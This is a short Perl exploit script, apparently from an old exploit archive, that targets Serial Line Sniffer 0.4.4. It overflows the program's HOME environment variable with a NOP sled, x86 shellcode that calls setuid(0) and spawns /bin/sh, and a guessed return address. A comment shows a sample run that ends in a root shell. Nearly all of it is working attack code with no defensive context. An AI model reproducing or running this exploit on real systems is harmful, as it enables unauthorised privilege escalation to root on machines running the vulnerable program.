# Author: Sintigan[at]shellcoders.com # http://www.shellcoders.com/ # ---------------------------------------- # Program ID: Serial Line Sniffer 0.4.4 # # sintigan@midnight:/home/sintigan$ perl slsnif-ploit.pl # sh-3.00# id # uid=0(root) gid=100(users) groups=100(users) # --------------------------------------- # # Greetz to Elohimus, Melkor, Modzilla, tgo, asTHma, and bk # and whoever else i forgot # #!/usr/bin/perl $shellcode = "\x31\xdb\x8d\x43\x17\xcd\x80\x31\xd2\x52\x68\x6e\x2f\x73\x68\x68\x2f\x2f\x62\x69\x89\xe3\x52\x53\x89\xe1\xb0\x0b\xcd\x80"; $buf = 288; $ret = 0xbffff3a0; $nop = "\x90"; $offset = -250; if (@ARGV == 1) { $offset = $ARGV[0]; } for ($i = 0; $i < ($buf - length($shellcode) - 100); $i++) { $buffer .= $nop; } $buffer .= $shellcode; $addr = pack('l', ($ret + $offset)); for ($i += length($shellcode); $i < $buf; $i += 4) { $buffer .= $addr; } $ENV{'HOME'} = $buffer; exec("/usr/local/bin/slsnif");